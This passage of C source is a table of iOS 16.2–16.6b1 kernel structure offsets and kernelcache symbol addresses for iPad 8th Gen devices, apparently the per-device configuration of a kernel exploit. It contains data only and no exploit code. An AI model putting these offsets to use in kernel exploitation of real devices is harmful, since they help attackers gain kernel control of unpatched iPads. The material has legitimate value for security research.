0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad 8th Gen Wifi // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077ebc60, .kernelcache__gPhysSize = 0xfffffff0077ebc60 + 8, .kernelcache__gVirtBase = 0xfffffff0077e9e40, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e3b3ac, .kernelcache__ptov_table = 0xfffffff00779f248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff00779c080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779e208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e8da44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077e7d48, .kernelcache__gPhysSize = 0xfffffff0077e7d48 + 8, .kernelcache__gVirtBase = 0xfffffff0077e5f28, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e37398, .kernelcache__ptov_table = 0xfffffff00779b288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff0077980c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779a248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e89a20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077e7d48, .kernelcache__gPhysSize = 0xfffffff0077e7d48 + 8, .kernelcache__gVirtBase = 0xfffffff0077e5f28, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e37398, .kernelcache__ptov_table = 0xfffffff00779b288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff0077980c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779a248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e89a20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a19d208, .kernelcache__gPhysBase = 0xfffffff0078c3fa0, .kernelcache__gPhysSize = 0xfffffff0078c3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c2178, .kernelcache__perfmon_devices = 0xfffffff00a1db500, .kernelcache__perfmon_dev_open = 0xfffffff007e55a88, .kernelcache__ptov_table = 0xfffffff007877160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1da990, .kernelcache__vm_pages = 0xfffffff007873ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007876110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1da988, .kernelcache__vn_kqfilter = 0xfffffff007ea463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a19d208, .kernelcache__gPhysBase = 0xfffffff0078c3fa0, .kernelcache__gPhysSize = 0xfffffff0078c3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c2178, .kernelcache__perfmon_devices = 0xfffffff00a1db500, .kernelcache__perfmon_dev_open = 0xfffffff007e55a88, .kernelcache__ptov_table = 0xfffffff007877160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1da990, .kernelcache__vm_pages = 0xfffffff007873ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007876110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1da988, .kernelcache__vn_kqfilter = 0xfffffff007ea463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a1a5288, .kernelcache__gPhysBase = 0xfffffff0078c80e0, .kernelcache__gPhysSize = 0xfffffff0078c80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c62b8, .kernelcache__perfmon_devices = 0xfffffff00a1e3500, .kernelcache__perfmon_dev_open = 0xfffffff007e59c8c, .kernelcache__ptov_table = 0xfffffff00787b160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1e2990, .kernelcache__vm_pages = 0xfffffff007877ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00787a110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1e2988, .kernelcache__vn_kqfilter = 0xfffffff007ea8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad Gen 8th, Cell, Data // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077ebc60, .kernelcache__gPhysSize = 0xfffffff0077ebc60 + 8, .kernelcache__gVirtBase = 0xfffffff0077e9e40, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e3b3ac, .kernelcache__ptov_table = 0xfffffff00779f248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff00779c080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779e208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e8da44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding 